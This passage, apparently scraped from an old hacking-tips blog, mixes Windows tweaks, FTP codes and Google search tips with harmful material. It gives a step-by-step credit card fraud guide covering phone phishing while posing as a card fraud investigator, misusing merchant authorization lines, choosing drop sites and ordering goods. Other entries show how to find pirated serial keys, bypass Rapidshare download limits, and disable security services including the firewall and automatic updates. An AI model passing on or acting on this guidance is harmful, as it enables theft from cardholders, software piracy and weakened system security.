  1318. * In the search field type: "Product name" 94FBR
  1319.  
  1320. * Where, "Product Name" is the name of the item you want to find the serial number for.
  1321.  
  1322. * And voila - there you go - the serial number you needed.
  1323.  
  1324. HOW DOES THIS WORK?
  1325.  
  1326. Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.
  1327.  
  1328. See these example searches:
  1329.  
  1330. "Photoshop 7" 94FBR
  1331. "Age of Mythology" 94FBR
  1332. "Nero Burning Rom 5.5" 94FBR
  1333. original from : http://www.the-cybers-skills.blogspot.com
  1334. Turn Off Unneeded Services, speed up pc
  1335. Wednesday, July 21, 2010 9:08 PM
  1336. here is a list of services that can be turned off
  1337. this will speed up your pc a bit
  1338.  
  1339. right click my computer
  1340. manage
  1341. services and applications
  1342. services
  1343.  
  1344. set these to disabled you will need to reboot for them to take effect if you have a problem with any just reenable them again ie if you have a smart card and you disable it wont work
  1345.  
  1346. alerter
  1347. application layer gateway service
  1348. application management
  1349. ati hotkey poller
  1350. automatic updates
  1351. background intelligent transfer service
  1352. clipbook
  1353. com+ event system
  1354. com+ system application
  1355. distributed transaction coordinator
  1356. error reporting service
  1357. fast user switching compatibility
  1358. help and support
  1359. human interface device access
  1360. imapi cd burning com service
  1361. indexing service
  1362. internet connection firewall(icf)/internet connecton sharing(ics)
  1363. ipsec services
  1364. logical disk manager
  1365. logical disk manager administrative service
  1366. messenger
  1367. ms software shadow copy provider
  1368. net logon
  1369. netmeeting remote desktop sharing
  1370. network dde
  1371. network dde dsdm
  1372. nt lm securtiy support provider
  1373. performance logs and alerts
  1374. portable media serial number service
  1375. qos rsvp
  1376. remote desktop help sesson manager
  1377. remote registry
  1378. removable storage
  1379. secondary logon
  1380. security accounts manager
  1381. server
  1382. smart card
  1383. smart card helper
  1384. ssdp discovery service
  1385. system restore service
  1386. task scheduler
  1387. tcp/ip netbios helper
  1388. telnet
  1389. terminal services
  1390. uninterruptible power supply
  1391. universal plug and play device host
  1392. upload manager
  1393. video proes
  1394. volume shadow copy
  1395. webclient
  1396. windows time
  1397. wireless zone configuration
  1398. wmi performance adapter
  1399. workstation
  1400. original from : http://www.the-cybers-skills.blogspot.com
  1401. Tip for shutdown windows - virus
  1402. Monday, August 29, 2011 1:35 AM
  1403. Try to open:
  1404.  
  1405. Run -> cmd -> shutdown -a
  1406.  
  1407. This prevent the shutdown.
  1408.  
  1409. create a new shortcut.. then write;
  1410. shutdown -s -t 0 = this is for shut down in 0 seconds (t = time s=shutdown)
  1411. shutdown -r -t 0 = same but this is for restart comp. in 0 seconds..
  1412. (only for windows xp)
  1413. in win.98 this is different; we were wrote rundll32.exe -s or something like this..i couldnt remember right now..
  1414. original from : http://www.the-cybers-skills.blogspot.com
  1415. Rapidshare Hacked, unlimited upload, no countdown
  1416. Saturday, September 17, 2011 2:31 AM
  1417. Its very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:
  1418.  
  1419. clean up IE or netscape or Firefox cookie( In this case the one that belong to rapidshare website)
  1420. On Command prompt (open MS-DOS)
  1421. type -----> ipconfig /flushdns <---Enter
  1422. type -----> ipconfig /release <---Enter
  1423. type -----> ipconfig /renew <---Enter
  1424. type -----> exit <--------Enter
  1425.  
  1426. Or save these commands in a bat file and run it everytime you need to fool Rapidshare server. Remember to clean up rapidshare cookie in your temp Internet files folder.
  1427.  
  1428. Now you should be ready to download/upload as many files as you want from their server.
  1429.  
  1430. another way, get proxies from the internet and apply to the browser.
  1431. some of proxies might not work though...
  1432.  
  1433. Note:
  1434. If you are on a LAN and behind a router (using NAT, for example)---this will not work.
  1435. If you use a fixed proxy--- this will not work.
  1436. If you have a fixed IP address from your ISP or college or employer or whatever -- this will not work.
  1437. If you happen to get the same IP address from your DHCP server because it's assigned to you -- this will not work
  1438. NO waiting
  1439. THIS "cheat" for RAPIDSHARE DOWNLOADS eliminates the "WAITING" for the file. No more COUNTDOWNS. So heres what you do:
  1440. 1. First, Find a rapidshare download.
  1441. 2. Hit the FREE BUTTON, like always.
  1442. 3. While your waiting for it to countdown, change the URL in the bar to:
  1443. Code:
  1444. java script:c(countdown = 0);
  1445. and hit ENTER or the GO button over and over. Eachtime you do so, it decreases 10-20 seconds. Few times and the link appears.
  1446. or you can simply do the code below ONCE
  1447. java script: for (i=0; i<30; i++) { c(); }
  1448. original from : http://www.the-cybers-skills.blogspot.com
  1449. Remote Shutdown
  1450. Saturday, September 17, 2011 2:31 AM
  1451. XP PRO has a lot of fun utilities. One of the most useful ones I have found to date is the ability to remotely reboot a PC. There are 2 ways of doing this. You will need to have admin access to the PC to preform these actions. That being said, here is the first way to do it:
  1452. Right click my computer, choose manage.
  1453. Highlight the Computer Management (Local) then click on Action, choose connect to another computer.
  1454. In the window that opens fill in the machine name of the PC you want to connect to and click ok.
  1455. Once connected right click on Computer Management (Remote machine name) and choose properties.
  1456. Go to the "Advanced" tab and click the Settings button under Start up and recovery.
  1457. Click on the Shutdown button.
  1458. Under action choose what you want to do (you can log off current user, shut down, restart, or power down. you can also choose if you want to force all applications to close, close hung apps, or wait for all apps to close by themselves).
  1459. The second way... Remember dos... that good old thing. Open up a command prompt and enter in the following:
  1460. %windir%\System32\shutdown.exe -r -m \\Machinename. The command prompt has more switches and options. I highly suggest using shutdown.exe /? to see all the posibilities.
  1461. original from : http://www.the-cybers-skills.blogspot.com
  1462. Credit Card Fraud
  1463. Saturday, September 17, 2011 2:31 AM
  1464. For most of you out there, money is hard to come by.  Until now:
  1465. With the recent advent of plastic money (credit cards), it is
  1466. easy to use someone else's credit card to order the items you have
  1467. always desired in life.  The stakes are high, but the payoff is
  1468. worth it.
  1469.  
  1470. Step One:  Getting the credit card information
  1471.  
  1472. First off, you must obtain the crucial item:  someone's credit
  1473. card number.  The best way to get credit card numbers is to take
  1474. the blue carbons used in a credit card transaction at your local
  1475. department store.  These can usually be found in the garbage can
  1476. next to the register, or for the more daring, in the garbage
  1477. dumpster behind the store.  But, due to the large amount of credit
  1478. card fraud, many stores have opted to use a carbonless transaction
  1479. sheet, making things much more difficult.  This is where your
  1480. phone comes in handy.
  1481. First, look up someone in the phone book, and obtain as much
  1482. information as possible about them.  Then, during business hours,
  1483. call in a very convincing voice - "Hello, this is John Doe from
  1484. the Visa Credit Card Fraud Investigations Department.  We have
  1485. been informed that your credit card may have been used for
  1486. fraudulent purposes, so will you please read off the numbers
  1487. appearing on your Visa card for verification."  Of course, use
  1488. your imagination!  Believe it or not, many people will fall for
  1489. this ploy and give out their credit information.
  1490. Now, assuming that you have your victim's credit card number, you
  1491. should be able to decipher the information given.
  1492.  
  1493. Step Two:  Recognizing information from carbon copies
  1494.  
  1495. Card examples:
  1496.  
  1497. [American Express]
  1498. XXXX XXXXXX XXXXX
  1499. MM/Y1 THRU MM/Y2
  1500. JOE SHMOE
  1501.  
  1502. [American Express]
  1503. XXXX XXXXXX XXXXX
  1504. MM/Y1 THRU MM/Y2
  1505. JOE SHMOE
  1506.  
  1507. Explanation:
  1508.  MM/Y1 is the date the card was issued, and MM/Y2 is the
  1509.  expiration date.  The American Express Gold Card has numbers
  1510.  XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00,
  1511.  even if the card holder is broke.
  1512.  
  1513. [Mastercard]
  1514. 5XXX XXXX XXXX XXXX
  1515. XXXX AAA DD-MM-YY MM/YY
  1516. JOE SHMOE
  1517.  
  1518. Explanation:
  1519.  XXXX in the second row may be asked for during the ordering
  1520.  process.  The first date is when the card was new, and the
  1521.  second is when the card expires.  The most frequent number
  1522.  combination used is 5424 1800 XXXX XXXX.  There are many of
  1523.  these cards in circulation, but many of these are on wanted
  1524.  lists, so check these first.
  1525.  
  1526. [Visa]
  1527. 4XXX XXX(X) XXX(X) XXX(X)
  1528. MM/YY    MM/YY*VISA
  1529. JOE SHMOE
  1530.  
  1531. Explanation:
  1532.  Visa is the most abundant card, and is accepted almost
  1533.  everywhere.  The "*VISA" is sometimes replaced with "BWG", or
  1534.  followed with a special code.  These codes are as follows:
  1535.  
  1536.  [1]  MM/YY*VISA V - Preferred Card
  1537.  [2]  MM/YY*VISA CV - Classic Card
  1538.  [3]  MM/YY*VISA PV - Premier Card
  1539.  
  1540.  Preferred Cards are backed with money, and are much safer to
  1541.  use.  Classic Cards are newer, harder to reproduce cards with
  1542.  decent backing.  Premier Cards are Classic Cards with Preferred
  1543.  coverage.  Common numbers are 4448 020 XXX XXX, 4254 5123 6000
  1544.  XXXX, and 4254 5123 8500 XXXX.  Any 4712 1250 XXXX XXXX cards
  1545.  are IBM Credit Union cards, and are risky to use, although
  1546.  they are usually covered for large purchases.
  1547.  
  1548. Step Three:  Testing credit
  1549.  
  1550. You should now have a Visa, Mastercard, or American Express
  1551. credit card number, with the victim's address, zip code, and phone
  1552. number.  By the way, if you have problems getting the address,
  1553. most phone companies offer the Address Tracking Service, which is
  1554. a special number you call that will give you an address from a
  1555. phone number, at a nominal charge.  Now you need to check the
  1556. balance of credit on the credit card (to make sure you don't run
  1557. out of money), and you must also make sure that the card isn't
  1558. stolen.  To do this you must obtain a phone number that
  1559. businesses use to check out credit cards during purchases.  If you
  1560. go to a department store, watch the cashier when someone makes a
  1561. credit card purchase.  He/she will usually call a phone number,
  1562. give the credit information, and then give what is called a
  1563. "Merchant Number".  These numbers are usually written down on or
  1564. around the register.  It is easy to either find these numbers and
  1565. copy them, or to wait until they call one in.  Watch what they
  1566. dial and wait for the 8 digit (usually) merchant number.  Once you
  1567. call the number, in a calm voice, read off the account number,
  1568. merchant number, amount, and expiration date.  The credit bureau
  1569. will tell you if it is ok, and will give you an authorization
  1570. number.  Pretend you are writing this number down, and repeat it
  1571. back to them to check it.  Ignore this number completely, for it
  1572. serves no real purpose.  However, once you do this, the bank
  1573. removes dollars equal to what you told them, because the card was
  1574. supposedly used to make a purchase.  Sometimes you can trick the
  1575. operator by telling her the customer changed his mind and decided
  1576. not to charge it.  Of course, some will not allow this.  Remember
  1577. at all times that you are supposed to be a store clerk calling to
  1578. check out the card for a purchase.  Act like you are talking with
  1579. a customer when he/she "cancels".
  1580. Step Four:  The drop
  1581. Once the cards are cleared, you must find a place to have the
  1582. package sent.  NEVER use a drop more than once.  The following are
  1583. typical drop sites:
  1584.  [1]  An empty house
  1585.      
  1586. An empty house makes an excellent place to send things.  Send the
  1587. package UPS, and leave a note on the door saying, "UPS.  I work
  1588. days, 8 to 6.  Could you please leave the package on the back door
  1589. step?"  You can find dozens of houses from a real estate agent by
  1590. telling them you want to look around for a house.  Ask for a list
  1591. of twenty houses for sale, and tell them you will check out the
  1592. area.  Do so, until you find one that suits your needs.
  1593.  [2]  Rent A Spot
  1594. U-Haul sometimes rents spaces where you can have packages sent and
  1595. signed for.  End your space when the package arrives.
  1596.  [3]  People's houses
  1597.  
  1598. Find someone you do not know, and have the package sent there.
  1599. Call ahead saying that "I called the store and they sent the
  1600. package to the wrong address.  It was already sent, but can you
  1601. keep it there for me?"  This is a very reliable way if you keep
  1602. calm when talking to the people.
  1603.  
  1604. Do NOT try post office boxes.  Most of the time, UPS will not
  1605. deliver to a post office box, and many people have been caught in
  1606. the past attempting to use a post office box.  Also, when you have
  1607. determined a drop site, keep an eye on it for suspicious
  1608. characters and cars that have not been there before.
  1609.  
  1610. Step Five:  Making the transaction
  1611.  
  1612. You should now have a reliable credit card number with all the
  1613. necessary billing information, and a good drop site.
  1614.  
  1615. The best place to order from is catalogues, and mail order houses.
  1616. It is in your best interest to place the phone call from a pay
  1617. phone, especially if it is a 1-800 number.  Now, when you call,
  1618. don't try to disguise your voice, thinking you will trick the
  1619. salesperson into believing you are an adult.  These folks are
  1620. trained to detect this, so your best bet is to order in your own
  1621. voice.  They will ask for the following:  name, name as it appears
  1622. on card, phone number, billing address, expiration date, method of
  1623. shipping, and product.  Ask if they offer UPS Red shipping (next
  1624. day arrival), because it gives them less time to research an
  1625. order.  If you are using American Express, you might have a bit of
  1626. a problem shipping to an address other than the billing address.
  1627. Also, if the salesperson starts to ask questions, do NOT hang up.
  1628. Simply talk your way out of the situation, so you won't encourage
  1629. investigation on the order.
  1630.  
  1631. If everything goes right, you should have the product, free of
  1632. charge.  Insurance picks up the tab, and no one is any wiser.  Be
  1633. careful, and try not to order anything over $500.  In some states,
  1634. UPS requires a signature for anything over $200, not to mention
  1635. that anything over $200 is defined as grand theft, as well as
  1636. credit fraud.  Get caught doing this, and you will bite it for a
  1637. couple of years.  Good luck!
  1638. original from : http://www.the-cybers-skills.blogspot.com
  1639. How to Find EVERYTHING uploaded on Rapidshare
  1640. Saturday, September 17, 2011 2:31 AM
  1641. All rapidshare.de Downloads:
  1642. /http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Arapidshare.de
  1643.  
  1644. Apps Rapidshare.de Downloads:
  1645. /http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Arapidshare.de&btnG=Search
  1646.  
  1647. Movies rapidshare.de Downloads:
  1648. /http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Arapidshare.de&btnG=Search
  1649.  
  1650. Have fun!!!
  1651. original from : http://www.the-cybers-skills.blogspot.com
  1652. How To Increase Download Speeds By 100-200 Kbps
  1653. Saturday, September 17, 2011 2:31 AM
  1654. First of all download this wonderful program:
  1655.  
  1656. h@@p://www.speedguide.net/files/TCPOptimizer.exe
  1657.  
  1658. Then when u start the program goto settings goto cable modem or dsl whatevcer u have.
  1659.  
  1660. Go to MaxMTU and set it to 1500 this is optimal anything above this will not work as well.
  1661.  
  1662. Thats bout it!! Enjoy the speed!!
  1663. original from : http://www.the-cybers-skills.blogspot.com
  1664. Common FTP Error Codes
  1665. Saturday, September 17, 2011 2:31 AM
  1666. # Description
  1667.  
  1668. 110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
  1669. 120 Service ready in nnn minutes.
  1670. 125 Data connection already open; transfer starting.
  1671. 150 File status okay; about to open data connection.
  1672. 200 Command okay.
  1673. 202 Command not implemented, superfluous at this site.
  1674. 211 System status, or system help reply.
  1675. 212 Directory status.
  1676. 213 File status.
  1677. 214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
  1678. 215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
  1679. 220 Service ready for new user.
  1680. 221 Service closing control connection.
  1681. 225 Data connection open; no transfer in progress.
  1682. 226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
  1683. 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
  1684. 230 User logged in, proceed. Logged out if appropriate.
  1685. 250 Requested file action okay, completed.
  1686. 257 "PATHNAME" created.
  1687. 331 User name okay, need password.
  1688. 332 Need account for login.
  1689. 350 Requested file action pending further information
  1690. 421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.
  1691. 425 Can't open data connection.
  1692.  
  1693. 426 Connection closed; transfer aborted.
  1694.  
  1695. 450 Requested file action not taken.
  1696.  
  1697. 451 Requested action aborted. Local error in processing.
  1698.  
  1699. 452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).
  1700.  
  1701. 500 Syntax error, command unrecognized. This may include errors such as command line too long.
  1702.  
  1703. 501 Syntax error in parameters or arguments.
  1704.  
  1705. 502 Command not implemented.
  1706.  
  1707. 503 Bad sequence of commands.
  1708.  
  1709. 504 Command not implemented for that parameter.
  1710.  
  1711. 530 Not logged in.
  1712.  
  1713. 532 Need account for storing files.
  1714.  
  1715. 550 Requested action not taken. File unavailable (e.g., file not found, no access).
  1716.  
  1717. 551 Requested action aborted. Page type unknown.
  1718.  
  1719. 552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
  1720.  
  1721. 553 Requested action not taken. File name not allowed.
  1722. original from : http://www.the-cybers-skills.blogspot.com
  1723. Ebay Hack crack tip
  1724. Saturday, September 17, 2011 2:31 AM
  1725. Just found this on the net, so I gave it a try.
  1726.  
  1727. Lo and behold, it actually works.
  1728.  
  1729. Very handy if you are an Ebayer.
  1730. Enjoy
  1731.  
  1732. When you look at an item and click on bid history all the bid amount are replaced with "-" until the end of the auction.
  1733.  
  1734. To view these amounts before the auction ends when viewing the item change
  1735.  
  1736.  
  1737. http://cgi.ebay.co.uk/ws/eBayISAPI.dll
  1738.  
  1739.  
  1740. in the address bar to
  1741.  
  1742.  
  1743. http://cgi.ebay.com/ws/eBayISAPI.dll
  1744.  
  1745.  
  1746. And then click on the bid history. The bid amounts will be shown.
  1747. original from : http://www.the-cybers-skills.blogspot.com
  1748. Create Bootable XP SP integrated CD
  1749. Saturday, September 17, 2011 2:31 AM
  1750. Slipstreaming Windows XP Service Pack 1a and Create Bootable CD
  1751.  
  1752. Slipstreaming a Service Pack, is the process to integrate the Service Pack into the installation so that with every new installation the Operating System and Service Pack are installed at the same time.
  1753.  
  1754. Slipstreaming is usually done on network shares on corporate systems. But with the advent of CD burners, it does actually make some sense for the home user or small business user to do the same.
  1755.  
  1756. Microsoft added the ability to Slipstream a Service Pack to Windows 2000 and Windows XP. It not only has the advantage that when you (re)install your OS, you don't have to apply the Service Pack later, also if you update any Windows component later, you'll be sure that you get the correct installation files if Windows needs any.
  1757.  
  1758.  
  1759. Slipstream Windows XP Service Pack 1a:
  1760. CODE
  1761. http://download.microsoft.com/download/5/4/f/54f8bcf8-bb4d-4613-8ee7-db69d01735ed/xpsp1a_en_x86.exe
  1762.  
  1763.  
  1764. Download the (full) "Network Install" of the Service Pack (English version [125 MB]), and save it to a directory (folder) on your hard drive (in my case D:\XP-SP1). Other languages can be downloaded from the Windows XP Web site.
  1765.  
  1766. Microsoft recently released Windows XP SP1a. The only difference is that this Service Pack does no longer include Microsoft's dated Java version. If you have already installed Windows XP SP1, there is no reason to install SP1a, but the "older" SP1 (with MS Java) is no longer available for download.
  1767. Next copy your Windows XP CD to your hard drive. Just create a folder (I used \XP-CD), and copy all the contents of your Windows XP CD in that folder.
  1768. Now create a folder to hold the Service Pack 1a (SP1a) files you are about to extract. I named it \XP-SP1. Next, open a Command Prompt (Start > Run > cmd), and go to the folder where you downloaded SP1a (cd \foldername). Type the command: servicepack filename -x. A small window will appear, and you need to point it to the folder where you want to extract the SP1 files. Click Ok to start extracting the SP1a files.
  1769.  
  1770. Once the SP1a files are extracted, change to the update folder of the SP1a files (cd update), and type the following command: update /s:path to WinXP CD files. In my example the command is update /s:D:\XP-CD).
  1771.  
  1772. Windows XP Update will do its thing:
  1773.  
  1774. When ready, you should get a confirmation. Windows XP Service Pack 1a has now been Slipstreamed into your original Windows XP files.
  1775.  
  1776. It is also possible to add the Windows XP Rollup 1 Update. For instructions, please read Adding Windows XP Rollup 1 Hotfix.
  1777.  
  1778.  
  1779. Creating a Bootable CD
  1780. For this part I used ISO Buster
  1781. CODE
  1782. http://www.smart-projects.net/isobuster/
  1783.  
  1784. and Nero Burning.
  1785.  
  1786. Start to extract the boot loader from the original Windows XP CD. Using ISO Buster, select the "folder" Bootable CD, and right-click Microsoft Corporation.img. From the menu choose Extract Microsoft Corporation.img, and extract it to the folder on your hard drive where you have your Windows XP files (D:\XP-CD in my case).
  1787.  
  1788. Next, start Nero Burning ROM, and choose CD-ROM (Boot) in the New Compilation window. On the Boot tab, select Image file under Source of boot image data, and browse to the location of the Microsoft Corporation.img file. Also enable Expert Settings, choosing No Emulation, and changing the Number of loaded sectors to 4 (otherwise it won't boot!)
  1789.  
  1790.  
  1791. If you have an older version of Nero you won't have the option Do Not Add ";1" ISO file version extention under Relax ISO Restrictions. You won't be able to boot your new CD, so update Nero!
  1792. You can configure the Label tab to your liking, I would however recommend that you keep the Volume Label the same as on your original Windows XP CD.
  1793.  
  1794. Next press New, and drag & drop the files and folders from your Windows XP hard drive location into Nero.
  1795.  
  1796. Next, burn your new CD.
  1797.  
  1798. You now have a Bootable, Slipstreamed Windows XP Service Pack 1a CD!
  1799. original from : http://www.the-cybers-skills.blogspot.com
  1800. Create One-Click Shutdown and Reboot Shortcuts
  1801. Saturday, September 17, 2011 2:31 AM
  1802. First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
  1803.  
  1804. But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
  1805.  
  1806. shutdown -r -t 01 -c "Rebooting your PC"
  1807. Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
  1808.  
  1809. I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
  1810.  
  1811. shutdown -s -t 03 -c "Bye Bye m8!"
  1812. shutdown -r -t 03 -c "Ill be back m8 ;)!"
  1813.  
  1814. Switch
  1815. What it does
  1816.  
  1817. -s
  1818. Shuts down the PC.
  1819.  
  1820. -l
  1821. Logs off the current user.
  1822.  
  1823. -t nn
  1824. Indicates the duration of delay, in seconds, before performing the action.
  1825.  
  1826. -c "messagetext"
  1827. Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
  1828.  
  1829. -f
  1830. Forces any running applications to shut down.
  1831.  
  1832. -r
  1833. Reboots the PC.
  1834. original from : http://www.the-cybers-skills.blogspot.com
  1835. Create Bootable Windows XP SP1 CD (nero)
  1836. Saturday, September 17, 2011 2:31 AM
  1837. How to create a bootable Windows XP SP1 CD (Nero):
  1838. Step 1
  1839.  
  1840. Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT
  1841.  
  1842. Step 2
  1843.  
  1844. Copy the entire Windows XP CD into folder C:\WINXPSP1
  1845.  
  1846. Step 3
  1847.  
  1848. You will have to download the SP1 Update, which is 133MB.
  1849. Rename the Service Pack file to XP-SP1.EXE
  1850. Extract the Service Pack from the Run Dialog using the command:
  1851. C:\XP-SP1.EXE -U -X:C:\SP1106
  1852.  
  1853. Step 4
  1854.  
  1855. Open Start/Run... and type the command:
  1856. C:\SP1106\update\update.exe -s:C:\WINXPSP1
  1857.  
  1858. Click OK
  1859.  
  1860. Folder C:\WINXPSP1 contains: Windows XP SP1
  1861.  
  1862.  
  1863.  
  1864. How to Create a Windows XP SP1 CD Bootable
  1865.  
  1866. Step 1
  1867.  
  1868. Download xpboot.zip
  1869. Code:
  1870. Code:
  1871. http://thro.port5.com/xpboot.zip
  1872.  
  1873. ( no download manager !! )
  1874.  
  1875. Extract xpboot.zip file (xpboot.bin) in to the folder C:\XPBOOT
  1876.  
  1877. Step 2
  1878.  
  1879. Start Nero - Burning Rom.
  1880. Select File > New... from the menu.
  1881. 1.) Select CD-ROM (Boot)
  1882. 2.) Select Image file from Source of boot image data
  1883. 3.) Set Kind of emulation: to No Emulation
  1884. 4.) Set Load segment of sectors (hex!): to 07C0
  1885. 5.) Set Number of loaded sectors: to 4
  1886. 6.) Press the Browse... button
  1887.  
  1888.  
  1889.  
  1890. Step 3
  1891.  
  1892. Select All Files (*.*) from File of type:
  1893. Locate boot.bin in the folder C:\XPBOOT
  1894.  
  1895. Step 4
  1896.  
  1897. Click ISO tab
  1898. Set File-/Directory length to ISO Level 1 (Max. of 11 = 8 + 3 chars)
  1899. Set Format to Mode 1
  1900. Set Character Set to ISO 9660
  1901. Check all Relax ISO Restrictions
  1902.  
  1903.  
  1904.  
  1905.  
  1906. Step 5
  1907.  
  1908. Click Label Tab
  1909. Select ISO9660 from the drop down box.
  1910. Enter the Volume Label as WB2PFRE_EN
  1911. Enter the System Identifier as WB2PFRE_EN
  1912. Enter the Volume Set as WB2PFRE_EN
  1913. Enter the Publisher as MICROSOFT CORPORATION
  1914. Enter the Data Preparer as MICROSOFT CORPORATION
  1915. Enter the Application as WB2PFRE_EN
  1916.  
  1917. * For Windows XP Professional OEM substitute WB2PFRE_EN with WXPOEM_EN
  1918. * For Windows XP Home OEM substitute WB2PFRE_EN with WXHOEM_EN
  1919.  
  1920. Step 6
  1921.  
  1922. Click Burn tab
  1923. Check Write
  1924. Check Finalize CD (No further writing possible!)
  1925. Set Write Method to Disk-At-Once
  1926.  
  1927. Press New button
  1928.  
  1929. Step 7
  1930.  
  1931. Locate the folder C:\WINXPSP1
  1932. Select everything in the folder and drag it to the ISO compilation panel.
  1933. Click the Write CD Dialog button.
  1934.  
  1935. Press Write
  1936.  
  1937. You're done.
  1938. original from : http://www.the-cybers-skills.blogspot.com
  1939. Change The Default Location For Installing Apps
  1940. Saturday, September 17, 2011 2:31 AM
  1941. As the size of hard drives increase, more people are using partitions to separate and store groups of files.
  1942.  
  1943. XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
  1944.  
  1945. Go to :-
  1946.  
  1947. - Start > Run
  1948.  
  1949. - Type “regedit” (without “” NOOBS!)
  1950.  
  1951. - Go to this directory…
  1952. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
  1953.  
  1954. - Look for the value named ProgramFilesDir. by default,this
  1955. original from : http://www.the-cybers-skills.blogspot.com
  1956. Broken Internet Explorer , How to fix it
  1957. Saturday, September 17, 2011 2:31 AM
  1958. So one of your friends, “not you of course”, has managed to nuke Internet Explorer and they are unsure how they did it. You’ve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, let’s try to do a repair on IE instead.
  1959.  
  1960. THE REPAIR PROCESS
  1961.  
  1962. Start the Registry Editor by typing regedit from the Run box. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383} and then right-click the “IsInstalled value.” Click Modify. From there, you will change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location. /http://www.microsoft.com/windows/ie/default.mspx
  1963.  
  1964. IF SOMETHING GOES WRONG
  1965.  
  1966. If messing with the registry and something goes horribly wrong, you can use “Last Known Good Configuration (F8 Safe Mode)” or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.
  1967.  
  1968. Hope this tut helps some members.
  1969. original from : http://www.the-cybers-skills.blogspot.com
  1970. Boot Windows xp Faster
  1971. Saturday, September 17, 2011 2:31 AM
  1972. Follow the following steps
  1973.  
  1974. 1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
  1975. 2. From the Start menu, select "Run..." & type "gpedit.msc".
  1976. 3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
  1977. 4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
  1978. 5. Click "OK", "Apply" & "OK" once again to exit.
  1979. 6. From the Start menu, select "Run..." & type "devmgmt.msc".
  1980. 7. Double click on "IDE ATA/ATAPI controllers"
  1981. 8. Right click on "Primary IDE Channel" and select "Properties".
  1982. 9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
  1983. 10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
  1984. 11. Reboot your computer.
  1985. original from : http://www.the-cybers-skills.blogspot.com
  1986. 20 Great Google Secrets
  1987. Saturday, September 17, 2011 2:31 AM
  1988. Google is clearly the best general-purpose search engine on the Web
  1989.  
  1990. But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.
  1991.  
  1992. But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.
  1993.  
  1994. Syntax Search Tricks
  1995.  
  1996. Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at
  1997.  
  1998. www.google.com/help/operators.html
  1999.  
  2000. . Here are some advanced operators that can help narrow down your search results.
  2001.  
  2002. Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.
  2003.  
  2004. Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as
  2005.  
  2006. www.mysite.com/index.html
  2007.  
  2008. , you can enter intext:html.
  2009.  
  2010. Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in
  2011.  
  2012. link:http://www.pcmag.com
  2013.  
  2014.  
  2015. Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.
  2016.  
  2017. Swiss Army Google
  2018.  
  2019. Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature
  2020.  
  2021. (www.google.com/help/features.html#calculator)
  2022.  
  2023. lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."
  2024.  
